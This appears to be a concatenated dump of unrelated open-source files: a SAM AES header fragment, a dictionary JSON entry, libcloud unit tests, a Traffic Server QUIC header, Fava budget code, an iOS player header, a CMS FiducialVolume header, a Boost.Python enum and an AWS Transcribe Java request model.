\brief (AES_VERSION) Version of the Hardware Module */ #define AES_VERSION_MFN_Pos 16 #define AES_VERSION_MFN_Msk (0x7u << AES_VERSION_MFN_Pos) /**< \brief (AES_VERSION) Metal Fix Number */ /*@}*/ #endif /* _SAM_AES_COMPONENT_ */
5,781
335
{ "word": "Grape", "definitions": [ "A berry (typically green, purple, or black) growing in clusters on a grapevine, eaten as fruit and used in making wine.", "Wine." ], "parts-of-speech": "Noun" }
93
1,435
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements.  See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License.  You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import unittest
import sys

import mock

from libcloud.common.base import LazyObject, Response
from libcloud.common.exceptions import BaseHTTPError, RateLimitReachedError
from libcloud.test import LibcloudTestCase


class LazyObjectTest(LibcloudTestCase):
    class A(LazyObject):
        def __init__(self, x, y=None):
            self.x = x
            self.y = y

    def test_lazy_init(self):
        # Test normal init
        a = self.A(1, y=2)
        self.assertTrue(isinstance(a, self.A))

        # Test lazy init
        with mock.patch.object(self.A, '__init__', return_value=None) as mock_init:
            a = self.A.lazy(3, y=4)
            self.assertTrue(isinstance(a, self.A))  # Proxy is a subclass of A
            mock_init.assert_not_called()

            # Since we have a mock init, an A object doesn't actually get
            # created. But, we can still call __dict__ on the proxy, which will
            # init the lazy object.
            self.assertEqual(a.__dict__, {})
            mock_init.assert_called_once_with(3, y=4)

    def test_setattr(self):
        a = self.A.lazy('foo', y='bar')
        a.z = 'baz'
        wrapped_lazy_obj = object.__getattribute__(a, '_lazy_obj')
        self.assertEqual(a.z, 'baz')
        self.assertEqual(wrapped_lazy_obj.z, 'baz')


class ErrorResponseTest(LibcloudTestCase):
    def mock_response(self, code, headers={}):
        m = mock.MagicMock()
        m.request = mock.Mock()
        m.headers = headers
        m.status_code = code
        m.text = None
        return m

    def test_rate_limit_response(self):
        resp_mock = self.mock_response(429, {'Retry-After': '120'})
        try:
            Response(resp_mock, mock.MagicMock())
        except RateLimitReachedError as e:
            self.assertEqual(e.retry_after, 120)
        except Exception:
            # We should have got a RateLimitReachedError
            self.fail("Caught exception should have been RateLimitReachedError")
        else:
            # We should have got an exception
            self.fail("HTTP Status 429 response didn't raise an exception")

    def test_error_with_retry_after(self):
        # 503 Service Unavailable may include Retry-After header
        resp_mock = self.mock_response(503, {'Retry-After': '300'})
        try:
            Response(resp_mock, mock.MagicMock())
        except BaseHTTPError as e:
            self.assertIn('retry-after', e.headers)
            self.assertEqual(e.headers['retry-after'], '300')
        else:
            # We should have got an exception
            self.fail("HTTP Status 503 response didn't raise an exception")

    @mock.patch('time.time', return_value=1231006505)
    def test_error_with_retry_after_http_date_format(self, time_mock):
        retry_after = 'Sat, 03 Jan 2009 18:20:05 -0000'
        # 503 Service Unavailable may include Retry-After header
        resp_mock = self.mock_response(503, {'Retry-After': retry_after})
        try:
            Response(resp_mock, mock.MagicMock())
        except BaseHTTPError as e:
            self.assertIn('retry-after', e.headers)
            # HTTP-date got translated to delay-secs
            self.assertEqual(e.headers['retry-after'], '300')
        else:
            # We should have got an exception
            self.fail("HTTP Status 503 response didn't raise an exception")


if __name__ == '__main__':
sys.exit(unittest.main())
1,751
1,351
<reponame>cmcfarlen/trafficserver /** @file A brief file description @section license License Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ #pragma once #include "tscore/ink_platform.h" #include "P_Connection.h" #include "P_NetAccept.h" #include "quic/QUICTypes.h" #include "quic/QUICConnectionTable.h" #include "quic/QUICResetTokenTable.h" class QUICClosedConCollector; class QUICNetVConnection; class QUICPacket; class QUICPacketHeaderProtector; class QUICPacketHandler { public: QUICPacketHandler(QUICResetTokenTable &rtable); ~QUICPacketHandler(); void send_packet(const QUICPacket &packet, QUICNetVConnection *vc, const QUICPacketHeaderProtector &pn_protector); void send_packet(QUICNetVConnection *vc, const Ptr<IOBufferBlock> &udp_payload); void close_connection(QUICNetVConnection *conn); protected: void _send_packet(const QUICPacket &packet, UDPConnection *udp_con, IpEndpoint &addr, uint32_t pmtu, const QUICPacketHeaderProtector *ph_protector, int dcil); void _send_packet(UDPConnection *udp_con, IpEndpoint &addr, Ptr<IOBufferBlock> udp_payload); QUICConnection *_check_stateless_reset(const uint8_t *buf, size_t buf_len); // FIXME Remove this // QUICPacketHandler could be a continuation, but NetAccept is a continuation too. 
virtual Continuation *_get_continuation() = 0; Event *_collector_event = nullptr; QUICClosedConCollector *_closed_con_collector = nullptr; virtual void _recv_packet(int event, UDPPacket *udpPacket) = 0; QUICResetTokenTable &_rtable; }; /* * @class QUICPacketHandlerIn * @brief QUIC Packet Handler for incoming connections */ class QUICPacketHandlerIn : public NetAccept, public QUICPacketHandler { public: QUICPacketHandlerIn(const NetProcessor::AcceptOptions &opt, QUICConnectionTable &ctable, QUICResetTokenTable &rtable); ~QUICPacketHandlerIn(); // NetAccept virtual NetProcessor *getNetProcessor() const override; virtual NetAccept *clone() const override; virtual int acceptEvent(int event, void *e) override; void init_accept(EThread *t) override; protected: // QUICPacketHandler Continuation *_get_continuation() override; private: void _recv_packet(int event, UDPPacket *udp_packet) override; int _stateless_retry(const uint8_t *buf, uint64_t buf_len, UDPConnection *connection, IpEndpoint from, QUICConnectionId dcid, QUICConnectionId scid, QUICConnectionId *original_cid, QUICConnectionId *retry_cid, QUICVersion version); bool _send_stateless_reset(QUICConnectionId dcid, uint32_t instance_id, UDPConnection *udp_con, IpEndpoint &addr, size_t maximum_size); void _send_invalid_token_error(const uint8_t *initial_packet, uint64_t initial_packet_len, UDPConnection *connection, IpEndpoint from); QUICConnectionTable &_ctable; }; /* * @class QUICPacketHandlerOut * @brief QUIC Packet Handler for outgoing connections */ class QUICPacketHandlerOut : public Continuation, public QUICPacketHandler { public: QUICPacketHandlerOut(QUICResetTokenTable &rtable); ~QUICPacketHandlerOut(){}; void init(QUICNetVConnection *vc); int event_handler(int event, Event *data); protected: // QUICPacketHandler Continuation *_get_continuation() override; private: void _recv_packet(int event, UDPPacket *udp_packet) override; QUICNetVConnection *_vc = nullptr; };
1,417
1,224
<reponame>edwardtheharris/fava """Parsing and computing budgets.""" import datetime from collections import Counter from collections import defaultdict from typing import Dict from typing import List from typing import NamedTuple from typing import Tuple from typing import TYPE_CHECKING from beancount.core.data import Custom from beancount.core.number import Decimal from fava.core.module_base import FavaModule from fava.helpers import BeancountError from fava.util.date import days_in_daterange from fava.util.date import Interval from fava.util.date import number_of_days_in_period if TYPE_CHECKING: # pragma: no cover from fava.core import FavaLedger class Budget(NamedTuple): """A budget entry.""" account: str date_start: datetime.date period: Interval number: Decimal currency: str BudgetDict = Dict[str, List[Budget]] class BudgetError(BeancountError): """Error with a budget.""" class BudgetModule(FavaModule): """Parses budget entries.""" def __init__(self, ledger: "FavaLedger") -> None: super().__init__(ledger) self.budget_entries: BudgetDict = {} def load_file(self) -> None: self.budget_entries, errors = parse_budgets( self.ledger.all_entries_by_type.Custom ) self.ledger.errors.extend(errors) def calculate( self, account: str, begin_date: datetime.date, end_date: datetime.date, ) -> Dict[str, Decimal]: """Calculate the budget for an account in an interval.""" return calculate_budget( self.budget_entries, account, begin_date, end_date ) def calculate_children( self, account: str, begin_date: datetime.date, end_date: datetime.date, ) -> Dict[str, Decimal]: """Calculate the budget for an account including its children.""" return calculate_budget_children( self.budget_entries, account, begin_date, end_date ) def __bool__(self) -> bool: return bool(self.budget_entries) def parse_budgets( custom_entries: List[Custom], ) -> Tuple[BudgetDict, List[BudgetError]]: """Parse budget directives from custom entries. Args: custom_entries: the Custom entries to parse budgets from. Returns: A dict of accounts to lists of budgets. Example: 2015-04-09 custom "budget" Expenses:Books "monthly" 20.00 EUR """ budgets: BudgetDict = defaultdict(list) errors = [] interval_map = { "daily": Interval.DAY, "weekly": Interval.WEEK, "monthly": Interval.MONTH, "quarterly": Interval.QUARTER, "yearly": Interval.YEAR, } for entry in (entry for entry in custom_entries if entry.type == "budget"): try: interval = interval_map.get(str(entry.values[1].value)) if not interval: errors.append( BudgetError( entry.meta, "Invalid interval for budget entry", entry, ) ) continue budget = Budget( entry.values[0].value, entry.date, interval, entry.values[2].value.number, entry.values[2].value.currency, ) budgets[budget.account].append(budget) except (IndexError, TypeError): errors.append( BudgetError(entry.meta, "Failed to parse budget entry", entry) ) return budgets, errors def _matching_budgets( budgets: BudgetDict, accounts: str, date_active: datetime.date ) -> Dict[str, Budget]: """Find matching budgets. Returns: The budget that is active on the specified date for the specified account. """ last_seen_budgets = {} for budget in budgets[accounts]: if budget.date_start <= date_active: last_seen_budgets[budget.currency] = budget else: break return last_seen_budgets def calculate_budget( budgets: BudgetDict, account: str, date_from: datetime.date, date_to: datetime.date, ) -> Dict[str, Decimal]: """Calculate budget for an account. Args: budgets: A list of :class:`Budget` entries. account: An account name. date_from: Starting date. 
date_to: End date (exclusive). Returns: A dictionary of currency to Decimal with the budget for the specified account and period. """ if account not in budgets: return {} currency_dict: Dict[str, Decimal] = defaultdict(Decimal) for single_day in days_in_daterange(date_from, date_to): matches = _matching_budgets(budgets, account, single_day) for budget in matches.values(): currency_dict[ budget.currency ] += budget.number / number_of_days_in_period( budget.period, single_day ) return currency_dict def calculate_budget_children( budgets: BudgetDict, account: str, date_from: datetime.date, date_to: datetime.date, ) -> Dict[str, Decimal]: """Calculate budget for an account including budgets of its children. Args: budgets: A list of :class:`Budget` entries. account: An account name. date_from: Starting date. date_to: End date (exclusive). Returns: A dictionary of currency to Decimal with the budget for the specified account and period. """ currency_dict: Dict[str, Decimal] = Counter() # type: ignore for child in budgets.keys(): if child.startswith(account): currency_dict.update( calculate_budget(budgets, child, date_from, date_to) ) return currency_dict
2,524
3,097
<filename>Wuxianda/Classes/Src/Video/Controllers/YPMoviePlayerViewController.h
//
//  YPMoviePlayerViewController.h
//  Wuxianda
//
//  Created by 胡云鹏 on 16/5/15.
//  Copyright © 2016 michaelhuyp. All rights reserved.
//  Video player
//

#import <UIKit/UIKit.h>
#import <IJKMediaFramework/IJKMediaFramework.h>

@interface YPMoviePlayerViewController : UIViewController

+ (void)presentFromViewController:(UIViewController *)viewController URL:(NSURL *)url animated:(BOOL)animated;

@end
187
852
<gh_stars>100-1000
#ifndef TrackAssociator_FiducialVolume_h
#define TrackAssociator_FiducialVolume_h 1

// -*- C++ -*-
//
// Package:    TrackAssociator
// Class:      FiducialVolume
//
/*

 Description: detector active volume described by a closed cylinder with non-zero thickness.

*/
//
// Original Author:  <NAME>
//

/// The detector active volume is estimated as a non-zero thickness
/// cylinder with outer dimensions maxZ and maxR. The inner dimensions are
/// found as the minimum R and Z for the two cases "barrel" (|eta|<1) and
/// "endcap" (|eta|>1.7) respectively

#include "DataFormats/GeometryVector/interface/GlobalPoint.h"
#include <vector>

class FiducialVolume {
public:
  FiducialVolume(double tolerance = 1.0) : tolerance_(tolerance) { reset(); }

  /// finalize dimension calculations, fixes the dimensions in the
  /// case of a missing barrel or endcap
  void determinInnerDimensions();

  /// check whether the volume is properly defined
  bool isValid() const;

  /// add a point that belongs to the active volume
  void addActivePoint(const GlobalPoint& point);

  /// invalidate the volume
  void reset();

  double minR(bool withTolerance = true) const {
    if (withTolerance && minR_ > tolerance_)
      return minR_ - tolerance_;
    else
      return minR_;
  }
  double maxR(bool withTolerance = true) const {
    if (withTolerance)
      return maxR_ + tolerance_;
    else
      return maxR_;
  }
  double minZ(bool withTolerance = true) const {
    if (withTolerance && minZ_ > tolerance_)
      return minZ_ - tolerance_;
    else
      return minZ_;
  }
  double maxZ(bool withTolerance = true) const {
    if (withTolerance)
      return maxZ_ + tolerance_;
    else
      return maxZ_;
  }

private:
  double minR_;
  double maxR_;
  double minZ_;
  double maxZ_;
  double tolerance_;
};
#endif
628
8,805
// Copyright <NAME> 2002. // Distributed under the Boost Software License, Version 1.0. (See // accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_1_0.txt) #ifndef OPERATOR_ID_DWA2002531_HPP # define OPERATOR_ID_DWA2002531_HPP namespace boost { namespace python { namespace detail { enum operator_id { op_add, op_sub, op_mul, op_div, op_mod, op_divmod, op_pow, op_lshift, op_rshift, op_and, op_xor, op_or, op_neg, op_pos, op_abs, op_invert, op_int, op_long, op_float, op_str, op_cmp, op_gt, op_ge, op_lt, op_le, op_eq, op_ne, op_iadd, op_isub, op_imul, op_idiv, op_imod, op_ilshift, op_irshift, op_iand, op_ixor, op_ior, op_complex, #if PY_VERSION_HEX >= 0x03000000 op_bool, #else op_nonzero, #endif op_repr #if PY_VERSION_HEX >= 0x03000000 ,op_truediv #endif }; }}} // namespace boost::python::detail #endif // OPERATOR_ID_DWA2002531_HPP
620
3,372
<filename>aws-java-sdk-transcribe/src/main/java/com/amazonaws/services/transcribe/model/CreateVocabularyFilterRequest.java /* * Copyright 2016-2021 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR * CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions * and limitations under the License. */ package com.amazonaws.services.transcribe.model; import java.io.Serializable; import javax.annotation.Generated; import com.amazonaws.AmazonWebServiceRequest; /** * * @see <a href="http://docs.aws.amazon.com/goto/WebAPI/transcribe-2017-10-26/CreateVocabularyFilter" target="_top">AWS * API Documentation</a> */ @Generated("com.amazonaws:aws-java-sdk-code-generator") public class CreateVocabularyFilterRequest extends com.amazonaws.AmazonWebServiceRequest implements Serializable, Cloneable { /** * <p> * The vocabulary filter name. The name must be unique within the account that contains it. If you try to create a * vocabulary filter with the same name as another vocabulary filter, you get a <code>ConflictException</code> * error. * </p> */ private String vocabularyFilterName; /** * <p> * The language code of the words in the vocabulary filter. All words in the filter must be in the same language. * The vocabulary filter can only be used with transcription jobs in the specified language. * </p> */ private String languageCode; /** * <p> * The words to use in the vocabulary filter. Only use characters from the character set defined for custom * vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for Custom * Vocabularies</a>. * </p> * <p> * If you provide a list of words in the <code>Words</code> parameter, you can't use the * <code>VocabularyFilterFileUri</code> parameter. * </p> */ private java.util.List<String> words; /** * <p> * The Amazon S3 location of a text file used as input to create the vocabulary filter. Only use characters from the * character set defined for custom vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for Custom * Vocabularies</a>. * </p> * <p> * The specified file must be less than 50 KB of UTF-8 characters. * </p> * <p> * If you provide the location of a list of words in the <code>VocabularyFilterFileUri</code> parameter, you can't * use the <code>Words</code> parameter. * </p> */ private String vocabularyFilterFileUri; /** * <p> * Adds one or more tags, each in the form of a key:value pair, to a new Amazon Transcribe vocabulary filter at the * time you create this new vocabulary filter. * </p> */ private java.util.List<Tag> tags; /** * <p> * The vocabulary filter name. The name must be unique within the account that contains it. If you try to create a * vocabulary filter with the same name as another vocabulary filter, you get a <code>ConflictException</code> * error. * </p> * * @param vocabularyFilterName * The vocabulary filter name. The name must be unique within the account that contains it. 
If you try to * create a vocabulary filter with the same name as another vocabulary filter, you get a * <code>ConflictException</code> error. */ public void setVocabularyFilterName(String vocabularyFilterName) { this.vocabularyFilterName = vocabularyFilterName; } /** * <p> * The vocabulary filter name. The name must be unique within the account that contains it. If you try to create a * vocabulary filter with the same name as another vocabulary filter, you get a <code>ConflictException</code> * error. * </p> * * @return The vocabulary filter name. The name must be unique within the account that contains it. If you try to * create a vocabulary filter with the same name as another vocabulary filter, you get a * <code>ConflictException</code> error. */ public String getVocabularyFilterName() { return this.vocabularyFilterName; } /** * <p> * The vocabulary filter name. The name must be unique within the account that contains it. If you try to create a * vocabulary filter with the same name as another vocabulary filter, you get a <code>ConflictException</code> * error. * </p> * * @param vocabularyFilterName * The vocabulary filter name. The name must be unique within the account that contains it. If you try to * create a vocabulary filter with the same name as another vocabulary filter, you get a * <code>ConflictException</code> error. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateVocabularyFilterRequest withVocabularyFilterName(String vocabularyFilterName) { setVocabularyFilterName(vocabularyFilterName); return this; } /** * <p> * The language code of the words in the vocabulary filter. All words in the filter must be in the same language. * The vocabulary filter can only be used with transcription jobs in the specified language. * </p> * * @param languageCode * The language code of the words in the vocabulary filter. All words in the filter must be in the same * language. The vocabulary filter can only be used with transcription jobs in the specified language. * @see LanguageCode */ public void setLanguageCode(String languageCode) { this.languageCode = languageCode; } /** * <p> * The language code of the words in the vocabulary filter. All words in the filter must be in the same language. * The vocabulary filter can only be used with transcription jobs in the specified language. * </p> * * @return The language code of the words in the vocabulary filter. All words in the filter must be in the same * language. The vocabulary filter can only be used with transcription jobs in the specified language. * @see LanguageCode */ public String getLanguageCode() { return this.languageCode; } /** * <p> * The language code of the words in the vocabulary filter. All words in the filter must be in the same language. * The vocabulary filter can only be used with transcription jobs in the specified language. * </p> * * @param languageCode * The language code of the words in the vocabulary filter. All words in the filter must be in the same * language. The vocabulary filter can only be used with transcription jobs in the specified language. * @return Returns a reference to this object so that method calls can be chained together. * @see LanguageCode */ public CreateVocabularyFilterRequest withLanguageCode(String languageCode) { setLanguageCode(languageCode); return this; } /** * <p> * The language code of the words in the vocabulary filter. All words in the filter must be in the same language. 
* The vocabulary filter can only be used with transcription jobs in the specified language. * </p> * * @param languageCode * The language code of the words in the vocabulary filter. All words in the filter must be in the same * language. The vocabulary filter can only be used with transcription jobs in the specified language. * @return Returns a reference to this object so that method calls can be chained together. * @see LanguageCode */ public CreateVocabularyFilterRequest withLanguageCode(LanguageCode languageCode) { this.languageCode = languageCode.toString(); return this; } /** * <p> * The words to use in the vocabulary filter. Only use characters from the character set defined for custom * vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for Custom * Vocabularies</a>. * </p> * <p> * If you provide a list of words in the <code>Words</code> parameter, you can't use the * <code>VocabularyFilterFileUri</code> parameter. * </p> * * @return The words to use in the vocabulary filter. Only use characters from the character set defined for custom * vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for * Custom Vocabularies</a>.</p> * <p> * If you provide a list of words in the <code>Words</code> parameter, you can't use the * <code>VocabularyFilterFileUri</code> parameter. */ public java.util.List<String> getWords() { return words; } /** * <p> * The words to use in the vocabulary filter. Only use characters from the character set defined for custom * vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for Custom * Vocabularies</a>. * </p> * <p> * If you provide a list of words in the <code>Words</code> parameter, you can't use the * <code>VocabularyFilterFileUri</code> parameter. * </p> * * @param words * The words to use in the vocabulary filter. Only use characters from the character set defined for custom * vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for * Custom Vocabularies</a>.</p> * <p> * If you provide a list of words in the <code>Words</code> parameter, you can't use the * <code>VocabularyFilterFileUri</code> parameter. */ public void setWords(java.util.Collection<String> words) { if (words == null) { this.words = null; return; } this.words = new java.util.ArrayList<String>(words); } /** * <p> * The words to use in the vocabulary filter. Only use characters from the character set defined for custom * vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for Custom * Vocabularies</a>. * </p> * <p> * If you provide a list of words in the <code>Words</code> parameter, you can't use the * <code>VocabularyFilterFileUri</code> parameter. * </p> * <p> * <b>NOTE:</b> This method appends the values to the existing list (if any). Use * {@link #setWords(java.util.Collection)} or {@link #withWords(java.util.Collection)} if you want to override the * existing values. * </p> * * @param words * The words to use in the vocabulary filter. Only use characters from the character set defined for custom * vocabularies. 
For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for * Custom Vocabularies</a>.</p> * <p> * If you provide a list of words in the <code>Words</code> parameter, you can't use the * <code>VocabularyFilterFileUri</code> parameter. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateVocabularyFilterRequest withWords(String... words) { if (this.words == null) { setWords(new java.util.ArrayList<String>(words.length)); } for (String ele : words) { this.words.add(ele); } return this; } /** * <p> * The words to use in the vocabulary filter. Only use characters from the character set defined for custom * vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for Custom * Vocabularies</a>. * </p> * <p> * If you provide a list of words in the <code>Words</code> parameter, you can't use the * <code>VocabularyFilterFileUri</code> parameter. * </p> * * @param words * The words to use in the vocabulary filter. Only use characters from the character set defined for custom * vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for * Custom Vocabularies</a>.</p> * <p> * If you provide a list of words in the <code>Words</code> parameter, you can't use the * <code>VocabularyFilterFileUri</code> parameter. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateVocabularyFilterRequest withWords(java.util.Collection<String> words) { setWords(words); return this; } /** * <p> * The Amazon S3 location of a text file used as input to create the vocabulary filter. Only use characters from the * character set defined for custom vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for Custom * Vocabularies</a>. * </p> * <p> * The specified file must be less than 50 KB of UTF-8 characters. * </p> * <p> * If you provide the location of a list of words in the <code>VocabularyFilterFileUri</code> parameter, you can't * use the <code>Words</code> parameter. * </p> * * @param vocabularyFilterFileUri * The Amazon S3 location of a text file used as input to create the vocabulary filter. Only use characters * from the character set defined for custom vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for * Custom Vocabularies</a>.</p> * <p> * The specified file must be less than 50 KB of UTF-8 characters. * </p> * <p> * If you provide the location of a list of words in the <code>VocabularyFilterFileUri</code> parameter, you * can't use the <code>Words</code> parameter. */ public void setVocabularyFilterFileUri(String vocabularyFilterFileUri) { this.vocabularyFilterFileUri = vocabularyFilterFileUri; } /** * <p> * The Amazon S3 location of a text file used as input to create the vocabulary filter. Only use characters from the * character set defined for custom vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for Custom * Vocabularies</a>. * </p> * <p> * The specified file must be less than 50 KB of UTF-8 characters. 
* </p> * <p> * If you provide the location of a list of words in the <code>VocabularyFilterFileUri</code> parameter, you can't * use the <code>Words</code> parameter. * </p> * * @return The Amazon S3 location of a text file used as input to create the vocabulary filter. Only use characters * from the character set defined for custom vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for * Custom Vocabularies</a>.</p> * <p> * The specified file must be less than 50 KB of UTF-8 characters. * </p> * <p> * If you provide the location of a list of words in the <code>VocabularyFilterFileUri</code> parameter, you * can't use the <code>Words</code> parameter. */ public String getVocabularyFilterFileUri() { return this.vocabularyFilterFileUri; } /** * <p> * The Amazon S3 location of a text file used as input to create the vocabulary filter. Only use characters from the * character set defined for custom vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for Custom * Vocabularies</a>. * </p> * <p> * The specified file must be less than 50 KB of UTF-8 characters. * </p> * <p> * If you provide the location of a list of words in the <code>VocabularyFilterFileUri</code> parameter, you can't * use the <code>Words</code> parameter. * </p> * * @param vocabularyFilterFileUri * The Amazon S3 location of a text file used as input to create the vocabulary filter. Only use characters * from the character set defined for custom vocabularies. For a list of character sets, see <a * href="https://docs.aws.amazon.com/transcribe/latest/dg/how-vocabulary.html#charsets">Character Sets for * Custom Vocabularies</a>.</p> * <p> * The specified file must be less than 50 KB of UTF-8 characters. * </p> * <p> * If you provide the location of a list of words in the <code>VocabularyFilterFileUri</code> parameter, you * can't use the <code>Words</code> parameter. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateVocabularyFilterRequest withVocabularyFilterFileUri(String vocabularyFilterFileUri) { setVocabularyFilterFileUri(vocabularyFilterFileUri); return this; } /** * <p> * Adds one or more tags, each in the form of a key:value pair, to a new Amazon Transcribe vocabulary filter at the * time you create this new vocabulary filter. * </p> * * @return Adds one or more tags, each in the form of a key:value pair, to a new Amazon Transcribe vocabulary filter * at the time you create this new vocabulary filter. */ public java.util.List<Tag> getTags() { return tags; } /** * <p> * Adds one or more tags, each in the form of a key:value pair, to a new Amazon Transcribe vocabulary filter at the * time you create this new vocabulary filter. * </p> * * @param tags * Adds one or more tags, each in the form of a key:value pair, to a new Amazon Transcribe vocabulary filter * at the time you create this new vocabulary filter. */ public void setTags(java.util.Collection<Tag> tags) { if (tags == null) { this.tags = null; return; } this.tags = new java.util.ArrayList<Tag>(tags); } /** * <p> * Adds one or more tags, each in the form of a key:value pair, to a new Amazon Transcribe vocabulary filter at the * time you create this new vocabulary filter. * </p> * <p> * <b>NOTE:</b> This method appends the values to the existing list (if any). 
Use * {@link #setTags(java.util.Collection)} or {@link #withTags(java.util.Collection)} if you want to override the * existing values. * </p> * * @param tags * Adds one or more tags, each in the form of a key:value pair, to a new Amazon Transcribe vocabulary filter * at the time you create this new vocabulary filter. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateVocabularyFilterRequest withTags(Tag... tags) { if (this.tags == null) { setTags(new java.util.ArrayList<Tag>(tags.length)); } for (Tag ele : tags) { this.tags.add(ele); } return this; } /** * <p> * Adds one or more tags, each in the form of a key:value pair, to a new Amazon Transcribe vocabulary filter at the * time you create this new vocabulary filter. * </p> * * @param tags * Adds one or more tags, each in the form of a key:value pair, to a new Amazon Transcribe vocabulary filter * at the time you create this new vocabulary filter. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateVocabularyFilterRequest withTags(java.util.Collection<Tag> tags) { setTags(tags); return this; } /** * Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be * redacted from this string using a placeholder value. * * @return A string representation of this object. * * @see java.lang.Object#toString() */ @Override public String toString() { StringBuilder sb = new StringBuilder(); sb.append("{"); if (getVocabularyFilterName() != null) sb.append("VocabularyFilterName: ").append(getVocabularyFilterName()).append(","); if (getLanguageCode() != null) sb.append("LanguageCode: ").append(getLanguageCode()).append(","); if (getWords() != null) sb.append("Words: ").append(getWords()).append(","); if (getVocabularyFilterFileUri() != null) sb.append("VocabularyFilterFileUri: ").append(getVocabularyFilterFileUri()).append(","); if (getTags() != null) sb.append("Tags: ").append(getTags()); sb.append("}"); return sb.toString(); } @Override public boolean equals(Object obj) { if (this == obj) return true; if (obj == null) return false; if (obj instanceof CreateVocabularyFilterRequest == false) return false; CreateVocabularyFilterRequest other = (CreateVocabularyFilterRequest) obj; if (other.getVocabularyFilterName() == null ^ this.getVocabularyFilterName() == null) return false; if (other.getVocabularyFilterName() != null && other.getVocabularyFilterName().equals(this.getVocabularyFilterName()) == false) return false; if (other.getLanguageCode() == null ^ this.getLanguageCode() == null) return false; if (other.getLanguageCode() != null && other.getLanguageCode().equals(this.getLanguageCode()) == false) return false; if (other.getWords() == null ^ this.getWords() == null) return false; if (other.getWords() != null && other.getWords().equals(this.getWords()) == false) return false; if (other.getVocabularyFilterFileUri() == null ^ this.getVocabularyFilterFileUri() == null) return false; if (other.getVocabularyFilterFileUri() != null && other.getVocabularyFilterFileUri().equals(this.getVocabularyFilterFileUri()) == false) return false; if (other.getTags() == null ^ this.getTags() == null) return false; if (other.getTags() != null && other.getTags().equals(this.getTags()) == false) return false; return true; } @Override public int hashCode() { final int prime = 31; int hashCode = 1; hashCode = prime * hashCode + ((getVocabularyFilterName() == null) ? 
0 : getVocabularyFilterName().hashCode()); hashCode = prime * hashCode + ((getLanguageCode() == null) ? 0 : getLanguageCode().hashCode()); hashCode = prime * hashCode + ((getWords() == null) ? 0 : getWords().hashCode()); hashCode = prime * hashCode + ((getVocabularyFilterFileUri() == null) ? 0 : getVocabularyFilterFileUri().hashCode()); hashCode = prime * hashCode + ((getTags() == null) ? 0 : getTags().hashCode()); return hashCode; } @Override public CreateVocabularyFilterRequest clone() { return (CreateVocabularyFilterRequest) super.clone(); } }
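A minimal usage sketch for the request model above (the client setup, filter name, and word list are illustrative assumptions, not part of the generated class):

// Usage sketch: assumes the standard AWS SDK for Java Transcribe client.
AmazonTranscribe transcribe = AmazonTranscribeClientBuilder.defaultClient();

CreateVocabularyFilterRequest request = new CreateVocabularyFilterRequest()
        .withVocabularyFilterName("profanity-filter")   // hypothetical filter name
        .withLanguageCode(LanguageCode.EnUS)
        .withWords("wordOne", "wordTwo");               // mutually exclusive with withVocabularyFilterFileUri(...)

transcribe.createVocabularyFilter(request);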
